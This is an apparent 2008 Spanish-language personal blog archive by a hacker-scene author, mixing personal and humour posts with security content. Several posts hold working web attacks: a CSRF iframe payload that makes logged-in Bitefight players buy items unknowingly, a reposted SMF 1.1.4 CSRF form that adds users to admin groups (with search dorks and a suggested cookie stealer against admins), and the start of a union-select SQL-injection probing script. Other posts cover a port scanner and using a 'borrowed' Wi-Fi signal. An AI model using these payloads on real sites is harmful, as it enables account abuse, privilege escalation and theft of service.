Entradas

Mostrando entradas de 2008

chekp0rt

Imagen
Bueno siguiendo con las clases de python xDD jeej hice un simple scanner de puertos, si se les ocurre algo que ponerle diganme y trataremos de ponerlo para las futuras versiones :-D

import socket

print "Simple Port Scanner - chekp0rt"
print "Komtec1 komtec1[at]gmail[dot]com"
print "www.hslteam.org"

def chekandopuertos():
probandoconexion = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
probandoconexion.connect((ip,x))
print "Puerto", x, "abierto en ", ip
print probandoconexion.connect((ip,x))
probandoconexion.close()
except:
pass
probandoconexion.close()

ip = raw_input("Ingresa la IP: ")
pinicial = int(raw_input("Ingresa el puerto Inicial: "))
pfinal = int(raw_input("Ingresa el puerto final: "))
for x in range(pinicial,pfinal):
try:
chekandopuertos()
except:
pass

y les adjunto el archivo y un screen de como funciona Lengua :

http://hslteam.org/chekp0rts.rar



PD. Ya hay ideas para la version 0.2 :-D

Saludos!!!!

Komtec1

Esekuele v 0.1

Imagen
Bueno esta es la primera version de esekuele conforme vaya teniendo mas tiempo y mas ideas la tratare de ir mejorando

hasta ahorita esta muuuuucho muy basica, lo unico que hace es verificar si la pagina es vulnerable si devuelve la cadena:

The used SELECT statements have a different number of columns

y de ahi sacar el numero de columnas.

ver si despues meterle un ataque de columnas mediante diccionario, conforme vaya teniendo mas tiempo y tambien si tienen ideas son
aceptadas para ver que mas le podemos poner :-D

aqui les dejo el code:

import urllib2
import string
uno = "-1/**/union/**/select/**/"
dos = "-1+union+select+/"
print '\n |-----------------------------------------------------------|'
print '\n |----| Komtec1 www.hslteam.org komtec1[at]gmail[dot]com |---|'
print '\n |-------------------| esekuele.py |-------------------------|'
print '\n |-----------------------------------------------------------|'
print '\n |Uso: \n Ingresa Url: &#…

Bitefight Vulnerabilidad XSRF Bitefight Vulnerabilidad XSRF

Imagen
Bueno hace algun tiempo (poco en realidad xD ) jugaba bitefight jejejej y por cuestiones ajenas a mi xD me bannearon la cuenta, estuve viendo y bitefight es vulnerable a XSRF lo investigue con algo sencillo, al ver que no pedia confirmacion alguna al momento de hacer un cambio en la cuenta trate con comprar fuerza registrandome con otra cuenta, algo asi:

al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto:

< width="0px" src="http://s7.bitefight.com.mx/bite/training.php?b=1" height="0px" align="center">< /iframe >

esa parte es para comprar fuerza, se agrega en una pagina y al momento que el usuario entra a la web maliciosa, automaticamente (si esta logueado en bitefight claro

defensa: http://s7.bitefight.com.mx/bite/training.php?b=2
destreza: http://s7.bite…

Trabajando con MySQL desde consola

Un poco de consultas sql con mysql :P

Bueno pongamos un tema acerca de consultas sql :P ahorita que las he estado practicando mas, algo basico pero psss weno para los que no sepan mucho aqui se pueden orientar un poco :P

los primeros pasos que sabemos (o al menos creo deberian saber :P) es conectarse a mysql de esta forma:

mysql -u suusuario -p

les pedira su pass y de ahi lo ingresan

despues si quieren que muestre las bases que tengan hacen esto:

show databases;

les mostrara las bases de datos que tengan ahi seleccionen con la que quieren trabajar:

use nombredesubasededatos

si quieren ver las tablas hacen esto:

show tables;

de ahi comenzamos la explicacion:


supongamos que tengo una base de datos llamada equis
primero nos situamos en la base de datos:

use equis

y en ella hay varias tablas pongamos que llamdas a,be,ce,de,e,efe y ge, dentro de ellas hay varios campos, supongamos que son por cada una respectivamente:


a1,a2,a3,a4,a5link,a6region

be1,be2,be3link,be4,be5,be6

ce1,ce2,ce3,ce4map,ce5,ce6

de1,de2,…

Skydrive de Microsoft Live

Weno hace tiempo que tengo el blog de http://musicindexof.com y psss ahi como saben (si es que han entrado alguna vez) se suben discos completos en descarga directa, encontrados por google claro :P pero habia un disco que me gusto mucho jejej y este es el de tenacious d the pick of destiny entonces un dia en el servidor que estaba lo pusieron off o quitaron las carpetas, no se cual de las dos :P y queria volver a ponerlo, busque algunas formas pero la mayoria no te daban descarga directa y/o escucharlo online, entonces un dia de esos que entro a mi gmail :P veo una publicidad de skydrive jejejej y me dio curiosidad por que decia almacenamiento gratis, psss entonces con la cuenta de mary (coolaboradora de http://musicindexof.com) me registre ahi mismo, usando la misma cuenta de hotmail de ella, primero subi una cancion y uando vi que me daba descarga directa psss dije: genial!!!!!!!!!!

http://1envhg.bay.livefilestore.com/y1pU2AV5rhlJsOlembYJ2LzDzvEclrcRS6ZsPmrzp56bQT9gDAo5cA97EwyTGrQrPZ…

You think you could fool smf?? :P

El mismo dia que vi lo del libro de lo desconocido en smf, tambien encontre unos comentarios algo graciosos xD y estan "referenciados" hacia los usuarios jejeje, los que vi estan en el archivo Loginout.php y algunos de ellos son estos:

En la linea 178:
// You forgot to type your username, dummy! Este es claro cuando no pones ningun usuario en el logueo xD

En la linea 192:
// No funky symbols either. Este es por si quieres poner algun simbolo "funky" xDDDDDDDDDD a esto se refieren en "/&%=)($?=)?# etc etc :P

y en la lnea 305:
// Bad password! Thought you could fool the database?! jajajaj xD aqui en una parte que regresa el error si la contraseña de usuario es incorrecta xD :P

jejejje esos de smf que curas xD

The Book of Unknown 4:16 Tambien en smf! muahahaha :P

Weno hace rato estaba leyendo el code de smf para entender unas cosillas de php y demas y en eso me tope con una parte chistosa jeje, asi como el Firefox tiene su libro de lo desconocido donde citan algunas frases medio raras, mafufas y tenebrosas, pssss nuestros amigos de simple machines forums o mas conocidos como smf tambien coolaboran con esta parte :P les dejo una direccion para que vean por uds mismos :P

http://www.google.com.mx/search?q=allinurl%3Aindex.php%3Faction%3Dabout%3Aunknown&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:es-ES:official&client=firefox-a

como ven ahi nos salen algunas paginas solamente, pero si quieres ver que esta en todos los smf, solo tienen que hacer esto:

http://url.com/path/index.php?action=about:unknown&verse=4:16
http://url.com/path/index.php?action=about:unknown&verse=2:18

y que a su vez nos redirige aqui:

http://www.unknownbrackets.com/about:unknown

:O :P

jejejej que cosas se ven en la pc T_T :P

pronto mas acerca de lo desconocido …

juajuajua soy un delincuente xD

[citar]
12.- Envía: Juan José Martínez
Pongan los nombres o firmas de esos hackers en el motor de busqueda de Google y verán que los tipos son profesionales, han hackeado infinidad de páginas y programas en México. Yo busqué el de Blesslost y el de Komtec1. Hagan la prueba y verás, los tipos de verdad que son unos delincuentes, se ufanan de haber hecho cantidad de barbaridades en la internet.
[/citar]

por culpa de zer0-z00rg soy un delincuente profesional! xD ajajaja :P :P :P :P felicidades por tus defaces bro ^^

Los dedos mas rapidos del oeste :P

jejejejej mi amigo Berumen me paso una pagina muy buena, es para ver cuantas palabras escribes por minuto, en mi 3er intento llegue aqui:

46 wordsSpeed test

You reached 282 points, so you achieved position 9408 of 50555 on the ranking list


You type 343 characters per minute
You have 46 correct words and
you have 0 wrong words

http://spanish-speedtest.10-fast-fingers.com/

veremos si sigo intentando despues y que lugar alcanzo jejej ^^

Saludos :-D :P

Estudio grafológico de mi firma :P

Aqui les dejo un estudio que le hice a mi firma y segun eso mi personalidad :P

Grafológicamente, la firma es una biografía abreviada de su autor.
Debe observarse conjuntamente con un texto que la acompañe, pero de cualquier forma, de acuerdo a ciertas características específicas de su signatura, se puede distinguir lo siguiente:

La ubicación en el papel indica que se manifiesta como una persona centrada y cautelosa.
Según el tamaño de la firma, mediano, tiende a una extraversión moderada.
El predominio de formas rectas, revela disciplina, orden y cierto pragmatismo.
La horizontalidad indica una personalidad equilibrada, que acepta sus aciertos y errores.
La velocidad media señala una persona medida y justa en su accionar.
Según la presión de la escritura, posee un temperamento práctico y activo.
Al no poseer rúbrica, revela autenticidad y claridad; una persona que se acepta y se muestra tal cual es.
Al tener solo algunas letras legibles, indica que toma ciertas reservas antes de conceder su co…

long long time ago... xD

jejejjeej revisando y depurando la pc me encontre con este archivo de texto que tenia guardado, una conversacion que tuve con mi amigo Eduardo jejeje (o droopy si alguien lo conoce xD) :P

(12:39 p.m.) •°o.O ·÷±‡± (•?: PUEDES CAMBIAR EL INDEX DE LA PAGINA
(12:39 p.m.) •°o.O ·÷±‡± (•?: XDDD
(12:39 p.m.) •°o.O ·÷±‡± (•?: DE MI CHAMBA
(12:40 p.m.) http://komtec1.b: psss si lo mas seguro que is
(12:40 p.m.) http://komtec1.b: por?
(12:40 p.m.) •°o.O ·÷±‡± (•?: ESQUE ESTA AQUI UN CUATE DE LA TARDE
(12:40 p.m.) •°o.O ·÷±‡± (•?: Y PARA QUE VEA TU GRANDEZA
(12:44 p.m.) http://komtec1.b: cuenta hasta 30 :P
(12:44 p.m.) http://komtec1.b: pero cuenta
(12:44 p.m.) http://komtec1.b: quiero ver que cuentes
(12:44 p.m.) http://komtec1.b: y te llevas un regalo :P
(12:44 p.m.) Has enviado un zumbido.
(12:44 p.m.) •°o.O ·÷±‡± (•?: JAJAJAJAJJAJA
(12:44 p.m.) •°o.O ·÷±‡± (•?: WEY YA NO MAMES
(12:44 p.m.) •°o.O ·÷±‡± (•?: DEJA = EL INDEX
(12:44 p.m.) http://komtec1.b: cuenta PAM
(12:44 p.m.) •°o.O ·÷±‡± (•?: 1
(1…

Google it's Watching you and the whole network too...

Imagen
Bueno el post nada de otro mundo, solo mostrare un error que a mi parecer tiene google en bugsense adsense.

Bugsense Adsense como saben es una forma de vender con un sitio web que pone anuncios relevantes dependiendo el contenido del sitio, en una parte de la configuración adsense dice que si tienes algun contenido protegido le asignes un usuario y una contraseña, asi adsense podra ingresar al sitio, ver el contenido relevante del sitio y poner los ads de acuerdo al contenido e interes de los visitantes.

En esta parte es donde adsense tiene el problema ya que como todos saben google guarda un cache de todas las paginas inclusive de paginas protegidas por contenido, por ejemplo si queremos entrar a un sitio protegido mediante htaccess y no tenemos el usuario y password adecuados no nos dejara entrar por obvias razones :P

Pongamos un ejemplo:

www.joomlaspanish.com/foros/showthread.php?p=73719

presionamos esc y nos dice algo como esto:

Authorization Required
This server could not verify that…

Que put@ excelente noche!

jjajajajaja mas mamon no se podia ver xD

*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
tengo como 0 MB de fotos de ---- ::X::X
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
10*
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
diez
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
te dire algo mira: select 10 MB ------' photos then do Add in -------.rar and send it to banivy@hslteam.org :D
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
jajajajajaaajajjaajjjajajjajaja
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
xD
*unicef٩(●̮̮̃•̃)۶ And fucking rocking, and fucking rollin! (8) dice:
Error 403
response denied
You dont have access to this zone
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dice:
achilles >
अ๑(L) FILFU4E !!dubA>کєҲγ کτγℓع™><<-Lovu!->> Quod Me Nutrit Me Destruit dic…

Mi Pin de google

Weno el 28 de mayo recibi este mail de google:

Recientemente le hemos enviado su número de identificación personal (PIN) por correo postal ordinario. Debería recibirlo en el transcurso de las próximas 4 semanas. Una vez recibido el PIN, deberá introducirlo en su cuenta a fin de poder recibir pagos de AdSense. Para ello, siga las instrucciones que se incluyen en el mensaje que acompaña el PIN.

Hoy 10 de Junio llego mi PIN es genial ver como una carta llega a tu nombre y mas cuando tiene el logotipo de google impreso!! creo que es la primera carta a mi nombre, fuera de las obscuro y feo pasado xD :P (una historia anexa a mi vida xD ) se siente genial, creo que guardare este sobre siempre ejejej xD aparte de que se me hace raro recibir correo a la "antigüita" xD actualmente solo trabajo sobre e-mail xD :P

Saludos!

2 Años

Imagen
Weno pss hoy 1o de junio del 2008 cumplo dos años en el under, hack, juack, seguridad informatica o como le llamen uds, ahi vamos poco a poco aprendiendo aun mas, con menos tiempo ahora pero psss se hace lo que se puede, he conocido a mucha mucha gente en esto, no menciono ni uno por que si no tendria que mencionar a todos, pero pss weno hslteam ya murio, el otro proyecto psss nadie acordo nada y demas, pero weno aqui en el blog vamos poniendo poco a poco lo que se pueda, espero estar aqui mucho mas tiempo y pss gracias a todos ^^ no se que mas poner :P solo queria decir esto jeejjej :P

Regalenme unos asi no?????

Stickies 6.5a

Imagen
Este es un buen programa para personas olvidadizas como yo xD, siempre se me olvida todo y si pego una notita no la cheko por que se me olvida leerla xD jejejejej pero weno aqui ya es diferente, por que si me acuerdo de presionar shift+teclalindows+s para que pueda ver las notas que tengo en la maquina :-P esta genial el programa, les dejo el link, y tiene idioma en español:

http://www.zhornsoftware.co.uk/stickies/download.html

puedes configurar los stickies como quieras, aqui para que cheken como se ve en mi escritorio:



Saludos!

Personalizando nuestra consola y programas en Linux

Imagen
Bueno tal vez en algunos videos han visto que por arte de magia se abre una consola, o la fuente se reduce y demas, algunos me han preguntado que como se hace, es muy sencillo lo unico que se tiene que hacer es accesar a la consola y de ahi en settings, veamos :-)



entrando ahi vemos muchas cosas como esto:



como ven ahi ya tengo predefinido el comando copiar con la combinacion de teclas alt+c :-D

selecciono enlarge font (hacer letra mas grande) y le doy esta combinacion de teclas:



damos aceptar, entramos a la consola y veran que al presionar ctrl+shift+up la letra se hara mas grande, hay varios tipos de comandos (shrink font o algo asi es para hacer la letra mas peque?a) prueben ahi y vean, claro que si quieren poner una combinacion como:

ctrl+c para copiar nunca podran hacerlo ya que hay algunos parametros predefinidos para la consola de linux, en este caso seria un break o abort por lo tanto no lo podrian pocupar tambien para la sentencia copiar, ahora bien veamos como ejecutar programas…

Configuración del modem e220 vodafone en slackware.

Imagen
Buenas, queridos usuarios y usuarias aquí teneis un árticulo que escribí hace algún tiempo.

Información:

Slackware 12.0.
Kernel por defecto, 2.6.21.5-smp
Minicom 2.1.
libwvstream.
Módem usb e220.
Compañia vodafone.

Nota: tenemos que tener el kernel actualizado con una version >= 2.6.20, ya que
si no existen problemas y se toma al e220 con un cdrom.

Primero veremos como desactivar el pin a la tarjeta de 64k que nos viene con el
módem, para ello utilízaremos minicom, tendremos que cónfigurar minicom para
que apunte hacia el módem, "/dev/ttyUSB0".

Entramos a minicom, esperamos a que nos de acceso a el módem, tecleamos
"ATZ" sin las comillas y presíonamos enter, seguídamente introducimos
(at+clck="sc",0,"XXXX"), donde XXXX es el pin actual, sin los paréntesis.

PD:Sí en un futuro queremos volver a habílitar el ping, ""at+clck="sc",1,"XXXX".

Instalamos libwvstream y wvdial (http://freshmeat.net/projects/wvdial/), ahora
creamos el ficher…

Manual Kismet

Imagen
Hago este manual ya que hace poco en el foro de elhacker.net vi un post de una persona que no le funcionaba el kismet, al no configurar el kismet.config nos da un error y al final dice:

Kismet Exiting



esto es solo por que aun no se a configurado kismet, son tres simples pasos los que se tienen que seguir, antes definamos kismet tal y como esta en man kismet (usen un traductor si no entienden ;-P)

Tomado de man kismet:


kismet -- Wireless sniffing and monitoring

DESCRIPTION
Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of nonbeaconing networks via data traffic.
kismet supports logging to the wtapfile packet format (readable by tcpdum…

Armar red lan con internet a partir de una wlan "prestada"

Imagen
Bueno en este tutorial explicare como armar una red lan a partir de una red wlan "prestada" (wireless) y asi podran tener internet gratis en varias pc's a partir de una lap top con la cual roban señal, veamos lo que necesitamos:


Cable Cruzado (crossover)



Cable Directo (el cable normal de ethernet)



Maquina con la que tomaran prestada señal wireless



Y por ultimo un router



expliquemos :-)

Lo primero que haremos sera tener la conexion lan externa, de ahi se nos asigna una ip por ejemplo:

192.168.1.75

ok tenemos nuestra ip quesera la que tiene la tarjeta wireless, de ahi vamos a configurar nuestro router con una ip quenosostros asignemos, por ejemplo:

10.10.10.254

esa sera la ip de nuestro router, ya hecho esto configuraremos nuestras tarjetas de ethernet asi:

10.10.10.x

entonces nos quedaria nuestra configuracion asi:

Maquina que roba señal wireless:

Configuracion Wireless:
IP : 192.168.1.75
Macara de subred: 255.255.255.0
Puerta de enlace predeterminada: 192.168.1.254 //(Esto varia de acuer…

Sorteo en python

Aqui dejo el code que me pidio kakalake, es para hacer un sorteo en random de n numero de concursantes, lo hice para el torneo de ajedrez de hslt jeje :-D

import random
a, b, c = 0, 9, []
res = 1
partida = 1
concursantes = int(raw_input("Numero de concursantes: "))
print '\n Seran ', concursantes, 'concursantes'
print '\n Escribe el nombre de cada uno: '
while concursantes > 0:
d = raw_input("")
c.append(d)
concursantes = concursantes-1
print '\nLos Concursantes que ingresaste son: ', c
while c > 0:
if c == []:
print 'Listo'
break
else:
a = random.choice(c)
b = random.choice(c)
if a == b:
a = random.choice(c)
b = random.choice(c)
else:
print 'Partida Numero ', partida, ': ', a
print 'Partida Numero ', partida, …

Deja te conecto

si solo una vez,
hinchado en alcohol, perdido en la noche,
soñando con volver, con volver.

Y solo quiero que me des un poco de sinceridad,
y solo quiero que me des un poco de sinceridad.

that song rockz! don u think?

MSN Down

Cancele mis cuentas de msn, si alguien quiere comunicarse que sea por aqui el blog o por mail komtec1@gmail.com :-) Saludos

El exnovio de la exnovia xD

jjajajajajajjaajaj

el exnovia de mi exnovia le pide a su exnovio que le pase a su exnovio, para lo que el exnovio responde al exnovio que quien es y que es su exnovia le responde...

tiene sentido??? xD aajajajajajajajjaj aunque no lo crea si me pasa ja ja ja

Buscar novia perfecta en GNU/Linux

En este artículo quiero demostrar que GNU/Linux es más que un sistema operativo y te puede ayudar hasta con tu vida personal. Por ejemplo, a buscarte la novia perfecta y todo lo que viene después, que no es poco…

Espero que no haga falta decir que es un artículo de humor y bastante geek xD

Empezaremos por buscar una novia

$ aptitude search novia

Nos la quedamos

$ aptitude install novia

Ojeamos sus atributos

$ stat novia

La comparas con otra a la que tanteabas desde hace una semana

$ cmp novia la_otra

Compruebas si hay conexión

$ ping novia

Y cómo es dicha conexión

$ netstat

Sí, definitivamente nos la quedamos. Nos aseguramos que sepa que somos su novio…

$ chown yo novia

…y de que no nos pueda poner los cuernos…

$ chmod 700 novia

La moldeamos a nuestro gusto

$ cat 95-60-90 >> novia

Nos vamos a una fiesta en casa de unos colegas y tenemos un calentón. Nos vamos a un lugar aislado, oculto

$ cd .dormitorio_padres_colega

Comprobamos que no hay nadie más

$ ls -a

Buscamos el fastidioso enganche del sujetador…

Recordando lo que es la vida

Bueno hace algo de tiempo que hslt esta down, aun no se sube por lo de la union y demas que se ha comentado, bueno solo quiero poner algunas cosas que me recuerdan lo que es la vida, jejeje y mas ahora que he tenido 93847293847298437743 de tiempo.

cosas buenas del metro:

1.-puedes leer en el metro, es en lo mejor que te ocupas mientras te transportas.
2.-servicio de las "3b" (bueno,bonito y barato) (mas adelante explico el por que entre comillas esto jejej)
3.-rapido

y aqui llegamos a lo mas interesante, que me recuerda por que odio hacer viajes en el metro, era un domingo por la tarde ;-P a las 13:00 horas, tenia que viajar de metro cd Azteca a metro Tasqueña, para despues llegar a la bendita Cuernavaca xD pero gracias a que ahora creo que cd Azteca es una "zona comercial xDDDDD" se han sucitado muchos problemas en respecto a la cantidad de gente por esa zona :-P aqui describo lo que se ve en el bendito metro, al menos por el domingo que fue que hice ese viaje largo j…

LOL xDDDDDDD

Komtec1@hslteam~against-revision-140# make
make -C src
make[1]: Entering directory `/root/against-revision-140/src'
Building USB Video Class driver...
/bin/sh: line 0: cd: /lib/modules/2.6.21.5/build: No such file or directory
make[1]: *** [uvcvideo] Error 1
make[1]: Leaving directory `/root/against-revision-140/src'
make: *** [all] Error 2
Komtec1@hslteam~against-revision-140# xDDDDDDDDD
-bash: xDDDDDDDDD: command not found

jajajajjajajaaajajajaja

Autenticacion, Autorizacion y Registro de Usuarios

Bueno este tema sera algo extenso, espero alguien se tome la molestia de leerlo completo asi como yo me tome la molestia de escribirlo :-P este tema lo aprendi de un libro, el cual es Enciclopedia de la Seguridad Informatica del Autor Alvaro Gomez Vieites, lo pondre a mis palabras y a mi entendimiento, si alguien desea consultar el libro a las palabras del autor ahi lo tienen :-)

Espero les guste el tema y no se cansen de leerlo que como ya mencione es extenso, aqui vamos :

Definiremos varios tipos de autentificacion de usuarios frente a un sistema informatico (cliente-servidor)

Modelo de Seguridad AAA (Authentication, Autorization & Accounting)

Se podria traducir de la siguiente forma: autenticacion, Autorizacion y Registro, este se utiliza para poder idenificar a usuarios y controlar el acceso de los mismos a diferentes recursos en un sistema informatico, y a la vez registrando como se utiliza cada recurso.

Basamos el modelo en tres elementos principales los cuales son:

Identificaci…

Nerdtest ja ja ja xD

Imagen
Bueno paseando por el gran mundo del internet xD me encontre con estos tests xD ajajajajajajajajaj y bueno creo que soy un nerd xDDDDDDDDDDD aajajajajajajajajajjajajajajajajajaja me mata xD








Komtec1

SMF 1.1.4 - Add User In Group [CSRF]

Bueno en primera este post lo saque de remoteexecution.es el link es este:

http://www.remoteexecution.es/foro/index.php?topic=879

Dork: "SMF 1.1.4"
Dork (SID): inurl:index.php inurl:sid= "SMF 1.1.4"


< h t m l >
< h e a d >
< b o d y >
< action="http://adress.com/path/index.php?action=membergroups;sa=members;group=GroupID" method="post" type="text" name="toAdd" id="toAdd" size="30">
< type="submit" name="add" value="Add Members">
< type="hidden" name="sc" value="ADMIN SESSION ID">
< /form>
< /body>
< /html>

o si no tambien se puede usar

forum/path/index.php?action=membergroups;sa=members;group=groupid;toAdd=usertoadd&add=Add+Members&sc=sid
by Syntacks!

Todo lo que usted necesita es administrador identificación de la sesión (SID), intentan engañar a los admin (utilizando cookie stealer etc ..)

|| …

Superacion Personal

Bueno aqui un poco mas de la historia de mi vida :-D aqui vamos espero no aburrirlos jejej como en los otros posts que he puesto :-P yaque este por lo que veo sera un poco largo, si lo leen todo dejen un comentario jejeje :-P

El comienzo

1o (Primero) de junio del 2006

Muahahahaha tengo el pass del msn de mi novia encriptado en hexadecimal, lo unico malo es que no secomo hacer para "descifrar" eso, vamos a buscar en internet, O aqui hay una pagina que se ve interesante, vamos a entrar.

Se ve que si ayudan a la gente, hay muchos usuario que ayudan y demas :-O genial me voy a registrar para preguntarles haber si saben como "descifrar" el pass en hexa

---------------------------------------------------------------
Nota:
Lo tenia en hexadecimal por que mi novia guardaba el pass en su pc, entonces quedaba guardado en el registro de lindows...
---------------------------------------------------------------

Pregunta:

Alguien me puede ayudar en descifrar esto:

xxxxxxxxxxxxxxxxxxxxxxxx…

jajajajaja luove xD

Todo comenzo un miercoles (era martes me equivoque al poner esto cada dia estoy mas loco xD) por la noche cuando estaba en el departamento xD sentado en la pc escuchando música.....

personajes:

YO - Y
CHAVA - C
SEÑORA - S
Lo que se pone entre parentesis son pensamientos xD

tiiiiiiiiiin tiiiiiiiiiiin suena el timbre
Y: Que weba quien sera??? nadie me busca a estas horas de la noche y menos entre semana
Se escuchan voces afuera...
Me asomo por la ventana y veo a una señora bajando con su hija por las escaleras, supongo yo quien habia tocado el timbre de la puerta....
Abro la puerta y la señora y su hija ya estaban en el piso de abajo, voltean a verme...
Y: Buenas noches
C: Si esta mamá
C: Buenas noches
S: Buenas noches
S: Psss dile tu hija
Y: (pensando a caray que onda 0.o)
C: (Se acerca) Hola
Y: Hola
C: ahhh es que lo que pasa
Y (ahhh caray que onda ¿'? me declarara su amor? xD jajajaaja xD me dira que le baje a la musica, queme dira que me dira??????? y ahorita?????? a las 10 de la noche??? por que v…

airpwn

Bueno aqui el video de como usar airpwn, viene una explicacion rapida dentro del video, pronto hare un tuto completo, mientras aqui tienen el video :-D

http://www.mediafire.com/?9hpdxd5jhnd tar

http://www.mediafire.com/?4djjbxdmjku rar

http://www.mediafire.com/?f2ovkznbcyo airpwn 1.3

Saludos

Komtec1